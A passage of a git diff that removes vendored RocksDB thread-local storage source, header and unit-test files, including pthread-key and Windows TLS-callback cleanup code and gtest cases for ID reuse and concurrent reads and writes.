-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return 0;
-}
-
-#endif  // ROCKSDB_USING_THREAD_STATUS
diff --git a/thirdparty/rocksdb/util/thread_local.cc b/thirdparty/rocksdb/util/thread_local.cc
deleted file mode 100644
index 5361951..0000000
--- a/thirdparty/rocksdb/util/thread_local.cc
+++ /dev/null
@@ -1,546 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/thread_local.h"
-#include "util/mutexlock.h"
-#include "port/likely.h"
-#include <stdlib.h>
-
-namespace rocksdb {
-
-struct Entry {
-  Entry() : ptr(nullptr) {}
-  Entry(const Entry& e) : ptr(e.ptr.load(std::memory_order_relaxed)) {}
-  std::atomic<void*> ptr;
-};
-
-class StaticMeta;
-
-// This is the structure that is declared as "thread_local" storage.
-// The vector keep list of atomic pointer for all instances for "current"
-// thread. The vector is indexed by an Id that is unique in process and
-// associated with one ThreadLocalPtr instance. The Id is assigned by a
-// global StaticMeta singleton. So if we instantiated 3 ThreadLocalPtr
-// instances, each thread will have a ThreadData with a vector of size 3:
-//     ---------------------------------------------------
-//     |          | instance 1 | instance 2 | instnace 3 |
-//     ---------------------------------------------------
-//     | thread 1 |    void*   |    void*   |    void*   | <- ThreadData
-//     ---------------------------------------------------
-//     | thread 2 |    void*   |    void*   |    void*   | <- ThreadData
-//     ---------------------------------------------------
-//     | thread 3 |    void*   |    void*   |    void*   | <- ThreadData
-//     ---------------------------------------------------
-struct ThreadData {
-  explicit ThreadData(ThreadLocalPtr::StaticMeta* _inst) : entries(), inst(_inst) {}
-  std::vector<Entry> entries;
-  ThreadData* next;
-  ThreadData* prev;
-  ThreadLocalPtr::StaticMeta* inst;
-};
-
-class ThreadLocalPtr::StaticMeta {
-public:
-  StaticMeta();
-
-  // Return the next available Id
-  uint32_t GetId();
-  // Return the next available Id without claiming it
-  uint32_t PeekId() const;
-  // Return the given Id back to the free pool. This also triggers
-  // UnrefHandler for associated pointer value (if not NULL) for all threads.
-  void ReclaimId(uint32_t id);
-
-  // Return the pointer value for the given id for the current thread.
-  void* Get(uint32_t id) const;
-  // Reset the pointer value for the given id for the current thread.
-  void Reset(uint32_t id, void* ptr);
-  // Atomically swap the supplied ptr and return the previous value
-  void* Swap(uint32_t id, void* ptr);
-  // Atomically compare and swap the provided value only if it equals
-  // to expected value.
-  bool CompareAndSwap(uint32_t id, void* ptr, void*& expected);
-  // Reset all thread local data to replacement, and return non-nullptr
-  // data for all existing threads
-  void Scrape(uint32_t id, autovector<void*>* ptrs, void* const replacement);
-  // Update res by applying func on each thread-local value. Holds a lock that
-  // prevents unref handler from running during this call, but clients must
-  // still provide external synchronization since the owning thread can
-  // access the values without internal locking, e.g., via Get() and Reset().
-  void Fold(uint32_t id, FoldFunc func, void* res);
-
-  // Register the UnrefHandler for id
-  void SetHandler(uint32_t id, UnrefHandler handler);
-
-  // protect inst, next_instance_id_, free_instance_ids_, head_,
-  // ThreadData.entries
-  //
-  // Note that here we prefer function static variable instead of the usual
-  // global static variable.  The reason is that c++ destruction order of
-  // static variables in the reverse order of their construction order.
-  // However, C++ does not guarantee any construction order when global
-  // static variables are defined in different files, while the function
-  // static variables are initialized when their function are first called.
-  // As a result, the construction order of the function static variables
-  // can be controlled by properly invoke their first function calls in
-  // the right order.
-  //
-  // For instance, the following function contains a function static
-  // variable.  We place a dummy function call of this inside
-  // Env::Default() to ensure the construction order of the construction
-  // order.
-  static port::Mutex* Mutex();
-
-  // Returns the member mutex of the current StaticMeta.  In general,
-  // Mutex() should be used instead of this one.  However, in case where
-  // the static variable inside Instance() goes out of scope, MemberMutex()
-  // should be used.  One example is OnThreadExit() function.
-  port::Mutex* MemberMutex() { return &mutex_; }
-
-private:
-  // Get UnrefHandler for id with acquiring mutex
-  // REQUIRES: mutex locked
-  UnrefHandler GetHandler(uint32_t id);
-
-  // Triggered before a thread terminates
-  static void OnThreadExit(void* ptr);
-
-  // Add current thread's ThreadData to the global chain
-  // REQUIRES: mutex locked
-  void AddThreadData(ThreadData* d);
-
-  // Remove current thread's ThreadData from the global chain
-  // REQUIRES: mutex locked
-  void RemoveThreadData(ThreadData* d);
-
-  static ThreadData* GetThreadLocal();
-
-  uint32_t next_instance_id_;
-  // Used to recycle Ids in case ThreadLocalPtr is instantiated and destroyed
-  // frequently. This also prevents it from blowing up the vector space.
-  autovector<uint32_t> free_instance_ids_;
-  // Chain all thread local structure together. This is necessary since
-  // when one ThreadLocalPtr gets destroyed, we need to loop over each
-  // thread's version of pointer corresponding to that instance and
-  // call UnrefHandler for it.
-  ThreadData head_;
-
-  std::unordered_map<uint32_t, UnrefHandler> handler_map_;
-
-  // The private mutex.  Developers should always use Mutex() instead of
-  // using this variable directly.
-  port::Mutex mutex_;
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-  // Thread local storage
-  static __thread ThreadData* tls_;
-#endif
-
-  // Used to make thread exit trigger possible if !defined(OS_MACOSX).
-  // Otherwise, used to retrieve thread data.
-  pthread_key_t pthread_key_;
-};
-
-
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-__thread ThreadData* ThreadLocalPtr::StaticMeta::tls_ = nullptr;
-#endif
-
-// Windows doesn't support a per-thread destructor with its
-// TLS primitives.  So, we build it manually by inserting a
-// function to be called on each thread's exit.
-// See http://www.codeproject.com/Articles/8113/Thread-Local-Storage-The-C-Way
-// and http://www.nynaeve.net/?p=183
-//
-// really we do this to have clear conscience since using TLS with thread-pools
-// is iffy
-// although OK within a request. But otherwise, threads have no identity in its
-// modern use.
-
-// This runs on windows only called from the System Loader
-#ifdef OS_WIN
-
-// Windows cleanup routine is invoked from a System Loader with a different
-// signature so we can not directly hookup the original OnThreadExit which is
-// private member
-// so we make StaticMeta class share with the us the address of the function so
-// we can invoke it.
-namespace wintlscleanup {
-
-// This is set to OnThreadExit in StaticMeta singleton constructor
-UnrefHandler thread_local_inclass_routine = nullptr;
-pthread_key_t thread_local_key = -1;
-
-// Static callback function to call with each thread termination.
-void NTAPI WinOnThreadExit(PVOID module, DWORD reason, PVOID reserved) {
-  // We decided to punt on PROCESS_EXIT
-  if (DLL_THREAD_DETACH == reason) {
-    if (thread_local_key != pthread_key_t(-1) && thread_local_inclass_routine != nullptr) {
-      void* tls = pthread_getspecific(thread_local_key);
-      if (tls != nullptr) {
-        thread_local_inclass_routine(tls);
-      }
-    }
-  }
-}
-
-}  // wintlscleanup
-
-// extern "C" suppresses C++ name mangling so we know the symbol name for the
-// linker /INCLUDE:symbol pragma above.
-extern "C" {
-
-#ifdef _MSC_VER
-// The linker must not discard thread_callback_on_exit.  (We force a reference
-// to this variable with a linker /include:symbol pragma to ensure that.) If
-// this variable is discarded, the OnThreadExit function will never be called.
-#ifdef _WIN64
-
-// .CRT section is merged with .rdata on x64 so it must be constant data.
-#pragma const_seg(".CRT$XLB")
-// When defining a const variable, it must have external linkage to be sure the
-// linker doesn't discard it.
-extern const PIMAGE_TLS_CALLBACK p_thread_callback_on_exit;
-const PIMAGE_TLS_CALLBACK p_thread_callback_on_exit =
-    wintlscleanup::WinOnThreadExit;
-// Reset the default section.
-#pragma const_seg()
-
-#pragma comment(linker, "/include:_tls_used")
-#pragma comment(linker, "/include:p_thread_callback_on_exit")
-
-#else  // _WIN64
-
-#pragma data_seg(".CRT$XLB")
-PIMAGE_TLS_CALLBACK p_thread_callback_on_exit = wintlscleanup::WinOnThreadExit;
-// Reset the default section.
-#pragma data_seg()
-
-#pragma comment(linker, "/INCLUDE:__tls_used")
-#pragma comment(linker, "/INCLUDE:_p_thread_callback_on_exit")
-
-#endif  // _WIN64
-
-#else
-// https://github.com/couchbase/gperftools/blob/master/src/windows/port.cc
-BOOL WINAPI DllMain(HINSTANCE h, DWORD dwReason, PVOID pv) {
-  if (dwReason == DLL_THREAD_DETACH)
-    wintlscleanup::WinOnThreadExit(h, dwReason, pv);
-  return TRUE;
-}
-#endif
-}  // extern "C"
-
-#endif  // OS_WIN
-
-void ThreadLocalPtr::InitSingletons() { ThreadLocalPtr::Instance(); }
-
-ThreadLocalPtr::StaticMeta* ThreadLocalPtr::Instance() {
-  // Here we prefer function static variable instead of global
-  // static variable as function static variable is initialized
-  // when the function is first call.  As a result, we can properly
-  // control their construction order by properly preparing their
-  // first function call.
-  //
-  // Note that here we decide to make "inst" a static pointer w/o deleting
-  // it at the end instead of a static variable.  This is to avoid the following
-  // destruction order disaster happens when a child thread using ThreadLocalPtr
-  // dies AFTER the main thread dies:  When a child thread happens to use
-  // ThreadLocalPtr, it will try to delete its thread-local data on its
-  // OnThreadExit when the child thread dies.  However, OnThreadExit depends
-  // on the following variable.  As a result, if the main thread dies before any
-  // child thread happen to use ThreadLocalPtr dies, then the destruction of
-  // the following variable will go first, then OnThreadExit, therefore causing
-  // invalid access.
-  //
-  // The above problem can be solved by using thread_local to store tls_ instead
-  // of using __thread.  The major difference between thread_local and __thread
-  // is that thread_local supports dynamic construction and destruction of
-  // non-primitive typed variables.  As a result, we can guarantee the
-  // destruction order even when the main thread dies before any child threads.
-  // However, thread_local is not supported in all compilers that accept -std=c++11
-  // (e.g., eg Mac with XCode < 8. XCode 8+ supports thread_local).
-  static ThreadLocalPtr::StaticMeta* inst = new ThreadLocalPtr::StaticMeta();
-  return inst;
-}
-
-port::Mutex* ThreadLocalPtr::StaticMeta::Mutex() { return &Instance()->mutex_; }
-
-void ThreadLocalPtr::StaticMeta::OnThreadExit(void* ptr) {
-  auto* tls = static_cast<ThreadData*>(ptr);
-  assert(tls != nullptr);
-
-  // Use the cached StaticMeta::Instance() instead of directly calling
-  // the variable inside StaticMeta::Instance() might already go out of
-  // scope here in case this OnThreadExit is called after the main thread
-  // dies.
-  auto* inst = tls->inst;
-  pthread_setspecific(inst->pthread_key_, nullptr);
-
-  MutexLock l(inst->MemberMutex());
-  inst->RemoveThreadData(tls);
-  // Unref stored pointers of current thread from all instances
-  uint32_t id = 0;
-  for (auto& e : tls->entries) {
-    void* raw = e.ptr.load();
-    if (raw != nullptr) {
-      auto unref = inst->GetHandler(id);
-      if (unref != nullptr) {
-        unref(raw);
-      }
-    }
-    ++id;
-  }
-  // Delete thread local structure no matter if it is Mac platform
-  delete tls;
-}
-
-ThreadLocalPtr::StaticMeta::StaticMeta() : next_instance_id_(0), head_(this) {
-  if (pthread_key_create(&pthread_key_, &OnThreadExit) != 0) {
-    abort();
-  }
-
-  // OnThreadExit is not getting called on the main thread.
-  // Call through the static destructor mechanism to avoid memory leak.
-  //
-  // Caveats: ~A() will be invoked _after_ ~StaticMeta for the global
-  // singleton (destructors are invoked in reverse order of constructor
-  // _completion_); the latter must not mutate internal members. This
-  // cleanup mechanism inherently relies on use-after-release of the
-  // StaticMeta, and is brittle with respect to compiler-specific handling
-  // of memory backing destructed statically-scoped objects. Perhaps
-  // registering with atexit(3) would be more robust.
-  //
-// This is not required on Windows.
-#if !defined(OS_WIN)
-  static struct A {
-    ~A() {
-#ifndef ROCKSDB_SUPPORT_THREAD_LOCAL
-      ThreadData* tls_ =
-        static_cast<ThreadData*>(pthread_getspecific(Instance()->pthread_key_));
-#endif
-      if (tls_) {
-        OnThreadExit(tls_);
-      }
-    }
-  } a;
-#endif  // !defined(OS_WIN)
-
-  head_.next = &head_;
-  head_.prev = &head_;
-
-#ifdef OS_WIN
-  // Share with Windows its cleanup routine and the key
-  wintlscleanup::thread_local_inclass_routine = OnThreadExit;
-  wintlscleanup::thread_local_key = pthread_key_;
-#endif
-}
-
-void ThreadLocalPtr::StaticMeta::AddThreadData(ThreadData* d) {
-  Mutex()->AssertHeld();
-  d->next = &head_;
-  d->prev = head_.prev;
-  head_.prev->next = d;
-  head_.prev = d;
-}
-
-void ThreadLocalPtr::StaticMeta::RemoveThreadData(
-    ThreadData* d) {
-  Mutex()->AssertHeld();
-  d->next->prev = d->prev;
-  d->prev->next = d->next;
-  d->next = d->prev = d;
-}
-
-ThreadData* ThreadLocalPtr::StaticMeta::GetThreadLocal() {
-#ifndef ROCKSDB_SUPPORT_THREAD_LOCAL
-  // Make this local variable name look like a member variable so that we
-  // can share all the code below
-  ThreadData* tls_ =
-      static_cast<ThreadData*>(pthread_getspecific(Instance()->pthread_key_));
-#endif
-
-  if (UNLIKELY(tls_ == nullptr)) {
-    auto* inst = Instance();
-    tls_ = new ThreadData(inst);
-    {
-      // Register it in the global chain, needs to be done before thread exit
-      // handler registration
-      MutexLock l(Mutex());
-      inst->AddThreadData(tls_);
-    }
-    // Even it is not OS_MACOSX, need to register value for pthread_key_ so that
-    // its exit handler will be triggered.
-    if (pthread_setspecific(inst->pthread_key_, tls_) != 0) {
-      {
-        MutexLock l(Mutex());
-        inst->RemoveThreadData(tls_);
-      }
-      delete tls_;
-      abort();
-    }
-  }
-  return tls_;
-}
-
-void* ThreadLocalPtr::StaticMeta::Get(uint32_t id) const {
-  auto* tls = GetThreadLocal();
-  if (UNLIKELY(id >= tls->entries.size())) {
-    return nullptr;
-  }
-  return tls->entries[id].ptr.load(std::memory_order_acquire);
-}
-
-void ThreadLocalPtr::StaticMeta::Reset(uint32_t id, void* ptr) {
-  auto* tls = GetThreadLocal();
-  if (UNLIKELY(id >= tls->entries.size())) {
-    // Need mutex to protect entries access within ReclaimId
-    MutexLock l(Mutex());
-    tls->entries.resize(id + 1);
-  }
-  tls->entries[id].ptr.store(ptr, std::memory_order_release);
-}
-
-void* ThreadLocalPtr::StaticMeta::Swap(uint32_t id, void* ptr) {
-  auto* tls = GetThreadLocal();
-  if (UNLIKELY(id >= tls->entries.size())) {
-    // Need mutex to protect entries access within ReclaimId
-    MutexLock l(Mutex());
-    tls->entries.resize(id + 1);
-  }
-  return tls->entries[id].ptr.exchange(ptr, std::memory_order_acquire);
-}
-
-bool ThreadLocalPtr::StaticMeta::CompareAndSwap(uint32_t id, void* ptr,
-    void*& expected) {
-  auto* tls = GetThreadLocal();
-  if (UNLIKELY(id >= tls->entries.size())) {
-    // Need mutex to protect entries access within ReclaimId
-    MutexLock l(Mutex());
-    tls->entries.resize(id + 1);
-  }
-  return tls->entries[id].ptr.compare_exchange_strong(
-      expected, ptr, std::memory_order_release, std::memory_order_relaxed);
-}
-
-void ThreadLocalPtr::StaticMeta::Scrape(uint32_t id, autovector<void*>* ptrs,
-    void* const replacement) {
-  MutexLock l(Mutex());
-  for (ThreadData* t = head_.next; t != &head_; t = t->next) {
-    if (id < t->entries.size()) {
-      void* ptr =
-          t->entries[id].ptr.exchange(replacement, std::memory_order_acquire);
-      if (ptr != nullptr) {
-        ptrs->push_back(ptr);
-      }
-    }
-  }
-}
-
-void ThreadLocalPtr::StaticMeta::Fold(uint32_t id, FoldFunc func, void* res) {
-  MutexLock l(Mutex());
-  for (ThreadData* t = head_.next; t != &head_; t = t->next) {
-    if (id < t->entries.size()) {
-      void* ptr = t->entries[id].ptr.load();
-      if (ptr != nullptr) {
-        func(ptr, res);
-      }
-    }
-  }
-}
-
-uint32_t ThreadLocalPtr::TEST_PeekId() {
-  return Instance()->PeekId();
-}
-
-void ThreadLocalPtr::StaticMeta::SetHandler(uint32_t id, UnrefHandler handler) {
-  MutexLock l(Mutex());
-  handler_map_[id] = handler;
-}
-
-UnrefHandler ThreadLocalPtr::StaticMeta::GetHandler(uint32_t id) {
-  Mutex()->AssertHeld();
-  auto iter = handler_map_.find(id);
-  if (iter == handler_map_.end()) {
-    return nullptr;
-  }
-  return iter->second;
-}
-
-uint32_t ThreadLocalPtr::StaticMeta::GetId() {
-  MutexLock l(Mutex());
-  if (free_instance_ids_.empty()) {
-    return next_instance_id_++;
-  }
-
-  uint32_t id = free_instance_ids_.back();
-  free_instance_ids_.pop_back();
-  return id;
-}
-
-uint32_t ThreadLocalPtr::StaticMeta::PeekId() const {
-  MutexLock l(Mutex());
-  if (!free_instance_ids_.empty()) {
-    return free_instance_ids_.back();
-  }
-  return next_instance_id_;
-}
-
-void ThreadLocalPtr::StaticMeta::ReclaimId(uint32_t id) {
-  // This id is not used, go through all thread local data and release
-  // corresponding value
-  MutexLock l(Mutex());
-  auto unref = GetHandler(id);
-  for (ThreadData* t = head_.next; t != &head_; t = t->next) {
-    if (id < t->entries.size()) {
-      void* ptr = t->entries[id].ptr.exchange(nullptr);
-      if (ptr != nullptr && unref != nullptr) {
-        unref(ptr);
-      }
-    }
-  }
-  handler_map_[id] = nullptr;
-  free_instance_ids_.push_back(id);
-}
-
-ThreadLocalPtr::ThreadLocalPtr(UnrefHandler handler)
-    : id_(Instance()->GetId()) {
-  if (handler != nullptr) {
-    Instance()->SetHandler(id_, handler);
-  }
-}
-
-ThreadLocalPtr::~ThreadLocalPtr() {
-  Instance()->ReclaimId(id_);
-}
-
-void* ThreadLocalPtr::Get() const {
-  return Instance()->Get(id_);
-}
-
-void ThreadLocalPtr::Reset(void* ptr) {
-  Instance()->Reset(id_, ptr);
-}
-
-void* ThreadLocalPtr::Swap(void* ptr) {
-  return Instance()->Swap(id_, ptr);
-}
-
-bool ThreadLocalPtr::CompareAndSwap(void* ptr, void*& expected) {
-  return Instance()->CompareAndSwap(id_, ptr, expected);
-}
-
-void ThreadLocalPtr::Scrape(autovector<void*>* ptrs, void* const replacement) {
-  Instance()->Scrape(id_, ptrs, replacement);
-}
-
-void ThreadLocalPtr::Fold(FoldFunc func, void* res) {
-  Instance()->Fold(id_, func, res);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/thread_local.h b/thirdparty/rocksdb/util/thread_local.h
deleted file mode 100644
index 1ca5b10..0000000
--- a/thirdparty/rocksdb/util/thread_local.h
+++ /dev/null
@@ -1,91 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <atomic>
-#include <functional>
-#include <memory>
-#include <unordered_map>
-#include <vector>
-
-#include "util/autovector.h"
-#include "port/port.h"
-
-namespace rocksdb {
-
-// Cleanup function that will be called for a stored thread local
-// pointer (if not NULL) when one of the following happens:
-// (1) a thread terminates
-// (2) a ThreadLocalPtr is destroyed
-typedef void (*UnrefHandler)(void* ptr);
-
-// ThreadLocalPtr stores only values of pointer type.  Different from
-// the usual thread-local-storage, ThreadLocalPtr has the ability to
-// distinguish data coming from different threads and different
-// ThreadLocalPtr instances.  For example, if a regular thread_local
-// variable A is declared in DBImpl, two DBImpl objects would share
-// the same A.  However, a ThreadLocalPtr that is defined under the
-// scope of DBImpl can avoid such confliction.  As a result, its memory
-// usage would be O(# of threads * # of ThreadLocalPtr instances).
-class ThreadLocalPtr {
- public:
-  explicit ThreadLocalPtr(UnrefHandler handler = nullptr);
-
-  ~ThreadLocalPtr();
-
-  // Return the current pointer stored in thread local
-  void* Get() const;
-
-  // Set a new pointer value to the thread local storage.
-  void Reset(void* ptr);
-
-  // Atomically swap the supplied ptr and return the previous value
-  void* Swap(void* ptr);
-
-  // Atomically compare the stored value with expected. Set the new
-  // pointer value to thread local only if the comparison is true.
-  // Otherwise, expected returns the stored value.
-  // Return true on success, false on failure
-  bool CompareAndSwap(void* ptr, void*& expected);
-
-  // Reset all thread local data to replacement, and return non-nullptr
-  // data for all existing threads
-  void Scrape(autovector<void*>* ptrs, void* const replacement);
-
-  typedef std::function<void(void*, void*)> FoldFunc;
-  // Update res by applying func on each thread-local value. Holds a lock that
-  // prevents unref handler from running during this call, but clients must
-  // still provide external synchronization since the owning thread can
-  // access the values without internal locking, e.g., via Get() and Reset().
-  void Fold(FoldFunc func, void* res);
-
-  // Add here for testing
-  // Return the next available Id without claiming it
-  static uint32_t TEST_PeekId();
-
-  // Initialize the static singletons of the ThreadLocalPtr.
-  //
-  // If this function is not called, then the singletons will be
-  // automatically initialized when they are used.
-  //
-  // Calling this function twice or after the singletons have been
-  // initialized will be no-op.
-  static void InitSingletons();
-
-  class StaticMeta;
-
-private:
-
-  static StaticMeta* Instance();
-
-  const uint32_t id_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/thread_local_test.cc b/thirdparty/rocksdb/util/thread_local_test.cc
deleted file mode 100644
index 6fee5ea..0000000
--- a/thirdparty/rocksdb/util/thread_local_test.cc
+++ /dev/null
@@ -1,582 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <thread>
-#include <atomic>
-#include <string>
-
-#include "rocksdb/env.h"
-#include "port/port.h"
-#include "util/autovector.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "util/thread_local.h"
-
-namespace rocksdb {
-
-class ThreadLocalTest : public testing::Test {
- public:
-  ThreadLocalTest() : env_(Env::Default()) {}
-
-  Env* env_;
-};
-
-namespace {
-
-struct Params {
-  Params(port::Mutex* m, port::CondVar* c, int* u, int n,
-         UnrefHandler handler = nullptr)
-      : mu(m),
-        cv(c),
-        unref(u),
-        total(n),
-        started(0),
-        completed(0),
-        doWrite(false),
-        tls1(handler),
-        tls2(nullptr) {}
-
-  port::Mutex* mu;
-  port::CondVar* cv;
-  int* unref;
-  int total;
-  int started;
-  int completed;
-  bool doWrite;
-  ThreadLocalPtr tls1;
-  ThreadLocalPtr* tls2;
-};
-
-class IDChecker : public ThreadLocalPtr {
-public:
-  static uint32_t PeekId() {
-    return TEST_PeekId();
-  }
-};
-
-}  // anonymous namespace
-
-// Suppress false positive clang analyzer warnings.
-#ifndef __clang_analyzer__
-TEST_F(ThreadLocalTest, UniqueIdTest) {
-  port::Mutex mu;
-  port::CondVar cv(&mu);
-
-  ASSERT_EQ(IDChecker::PeekId(), 0u);
-  // New ThreadLocal instance bumps id by 1
-  {
-    // Id used 0
-    Params p1(&mu, &cv, nullptr, 1u);
-    ASSERT_EQ(IDChecker::PeekId(), 1u);
-    // Id used 1
-    Params p2(&mu, &cv, nullptr, 1u);
-    ASSERT_EQ(IDChecker::PeekId(), 2u);
-    // Id used 2
-    Params p3(&mu, &cv, nullptr, 1u);
-    ASSERT_EQ(IDChecker::PeekId(), 3u);
-    // Id used 3
-    Params p4(&mu, &cv, nullptr, 1u);
-    ASSERT_EQ(IDChecker::PeekId(), 4u);
-  }
-  // id 3, 2, 1, 0 are in the free queue in order
-  ASSERT_EQ(IDChecker::PeekId(), 0u);
-
-  // pick up 0
-  Params p1(&mu, &cv, nullptr, 1u);
-  ASSERT_EQ(IDChecker::PeekId(), 1u);
-  // pick up 1
-  Params* p2 = new Params(&mu, &cv, nullptr, 1u);
-  ASSERT_EQ(IDChecker::PeekId(), 2u);
-  // pick up 2
-  Params p3(&mu, &cv, nullptr, 1u);
-  ASSERT_EQ(IDChecker::PeekId(), 3u);
-  // return up 1
-  delete p2;
-  ASSERT_EQ(IDChecker::PeekId(), 1u);
-  // Now we have 3, 1 in queue
-  // pick up 1
-  Params p4(&mu, &cv, nullptr, 1u);
-  ASSERT_EQ(IDChecker::PeekId(), 3u);
-  // pick up 3
-  Params p5(&mu, &cv, nullptr, 1u);
-  // next new id
-  ASSERT_EQ(IDChecker::PeekId(), 4u);
-  // After exit, id sequence in queue:
-  // 3, 1, 2, 0
-}
-#endif  // __clang_analyzer__
-
-TEST_F(ThreadLocalTest, SequentialReadWriteTest) {
-  // global id list carries over 3, 1, 2, 0
-  ASSERT_EQ(IDChecker::PeekId(), 0u);
-
-  port::Mutex mu;
-  port::CondVar cv(&mu);
-  Params p(&mu, &cv, nullptr, 1);
-  ThreadLocalPtr tls2;
-  p.tls2 = &tls2;
-
-  auto func = [](void* ptr) {
-    auto& params = *static_cast<Params*>(ptr);
-
-    ASSERT_TRUE(params.tls1.Get() == nullptr);
-    params.tls1.Reset(reinterpret_cast<int*>(1));
-    ASSERT_TRUE(params.tls1.Get() == reinterpret_cast<int*>(1));
-    params.tls1.Reset(reinterpret_cast<int*>(2));
-    ASSERT_TRUE(params.tls1.Get() == reinterpret_cast<int*>(2));
-
-    ASSERT_TRUE(params.tls2->Get() == nullptr);
-    params.tls2->Reset(reinterpret_cast<int*>(1));
-    ASSERT_TRUE(params.tls2->Get() == reinterpret_cast<int*>(1));
-    params.tls2->Reset(reinterpret_cast<int*>(2));
-    ASSERT_TRUE(params.tls2->Get() == reinterpret_cast<int*>(2));
-
-    params.mu->Lock();
-    ++(params.completed);
-    params.cv->SignalAll();
-    params.mu->Unlock();
-  };
-
-  for (int iter = 0; iter < 1024; ++iter) {
-    ASSERT_EQ(IDChecker::PeekId(), 1u);
-    // Another new thread, read/write should not see value from previous thread
-    env_->StartThread(func, static_cast<void*>(&p));
-    mu.Lock();
-    while (p.completed != iter + 1) {
-      cv.Wait();
-    }
-    mu.Unlock();
-    ASSERT_EQ(IDChecker::PeekId(), 1u);
-  }
-}
-
-TEST_F(ThreadLocalTest, ConcurrentReadWriteTest) {
-  // global id list carries over 3, 1, 2, 0
-  ASSERT_EQ(IDChecker::PeekId(), 0u);
-
-  ThreadLocalPtr tls2;
-  port::Mutex mu1;
-  port::CondVar cv1(&mu1);
-  Params p1(&mu1, &cv1, nullptr, 16);
-  p1.tls2 = &tls2;
-
-  port::Mutex mu2;
-  port::CondVar cv2(&mu2);
-  Params p2(&mu2, &cv2, nullptr, 16);
-  p2.doWrite = true;
-  p2.tls2 = &tls2;
-
-  auto func = [](void* ptr) {
-    auto& p = *static_cast<Params*>(ptr);
-
-    p.mu->Lock();
-    // Size_T switches size along with the ptr size
-    // we want to cast to.
-    size_t own = ++(p.started);
-    p.cv->SignalAll();
-    while (p.started != p.total) {
-      p.cv->Wait();
-    }
-    p.mu->Unlock();
-
-    // Let write threads write a different value from the read threads
-    if (p.doWrite) {
-      own += 8192;
-    }
-
-    ASSERT_TRUE(p.tls1.Get() == nullptr);
-    ASSERT_TRUE(p.tls2->Get() == nullptr);
-
-    auto* env = Env::Default();
-    auto start = env->NowMicros();
-
-    p.tls1.Reset(reinterpret_cast<size_t*>(own));
-    p.tls2->Reset(reinterpret_cast<size_t*>(own + 1));
-    // Loop for 1 second
-    while (env->NowMicros() - start < 1000 * 1000) {
-      for (int iter = 0; iter < 100000; ++iter) {
-        ASSERT_TRUE(p.tls1.Get() == reinterpret_cast<size_t*>(own));
-        ASSERT_TRUE(p.tls2->Get() == reinterpret_cast<size_t*>(own + 1));
-        if (p.doWrite) {
-          p.tls1.Reset(reinterpret_cast<size_t*>(own));
-          p.tls2->Reset(reinterpret_cast<size_t*>(own + 1));
-        }
-      }
-    }
-
-    p.mu->Lock();
-    ++(p.completed);
-    p.cv->SignalAll();
-    p.mu->Unlock();
-  };
-
-  // Initiate 2 instnaces: one keeps writing and one keeps reading.
-  // The read instance should not see data from the write instance.
-  // Each thread local copy of the value are also different from each
-  // other.
-  for (int th = 0; th < p1.total; ++th) {
-    env_->StartThread(func, static_cast<void*>(&p1));
-  }
-  for (int th = 0; th < p2.total; ++th) {
-    env_->StartThread(func, static_cast<void*>(&p2));
-  }
-
-  mu1.Lock();
-  while (p1.completed != p1.total) {
-    cv1.Wait();
-  }
-  mu1.Unlock();
-
-  mu2.Lock();
-  while (p2.completed != p2.total) {
-    cv2.Wait();
-  }
-  mu2.Unlock();
-
-  ASSERT_EQ(IDChecker::PeekId(), 3u);
-}
-
-TEST_F(ThreadLocalTest, Unref) {
-  ASSERT_EQ(IDChecker::PeekId(), 0u);
-
-  auto unref = [](void* ptr) {
-    auto& p = *static_cast<Params*>(ptr);
-    p.mu->Lock();
-    ++(*p.unref);
-    p.mu->Unlock();
-  };
-
-  // Case 0: no unref triggered if ThreadLocalPtr is never accessed
-  auto func0 = [](void* ptr) {
-    auto& p = *static_cast<Params*>(ptr);
-
-    p.mu->Lock();
-    ++(p.started);
-    p.cv->SignalAll();
-    while (p.started != p.total) {
-      p.cv->Wait();
-    }
-    p.mu->Unlock();
-  };
-
-  for (int th = 1; th <= 128; th += th) {
-    port::Mutex mu;
-    port::CondVar cv(&mu);
-    int unref_count = 0;
-    Params p(&mu, &cv, &unref_count, th, unref);
-
-    for (int i = 0; i < p.total; ++i) {
-      env_->StartThread(func0, static_cast<void*>(&p));
-    }
-    env_->WaitForJoin();
-    ASSERT_EQ(unref_count, 0);
-  }
-
-  // Case 1: unref triggered by thread exit
-  auto func1 = [](void* ptr) {
-    auto& p = *static_cast<Params*>(ptr);
-
-    p.mu->Lock();
-    ++(p.started);
-    p.cv->SignalAll();
-    while (p.started != p.total) {
-      p.cv->Wait();
-    }
-    p.mu->Unlock();
-
-    ASSERT_TRUE(p.tls1.Get() == nullptr);
-    ASSERT_TRUE(p.tls2->Get() == nullptr);
-
-    p.tls1.Reset(ptr);
-    p.tls2->Reset(ptr);
-
-    p.tls1.Reset(ptr);
-    p.tls2->Reset(ptr);
-  };
-
-  for (int th = 1; th <= 128; th += th) {
-    port::Mutex mu;
-    port::CondVar cv(&mu);
-    int unref_count = 0;
-    ThreadLocalPtr tls2(unref);
-    Params p(&mu, &cv, &unref_count, th, unref);
-    p.tls2 = &tls2;
-
-    for (int i = 0; i < p.total; ++i) {
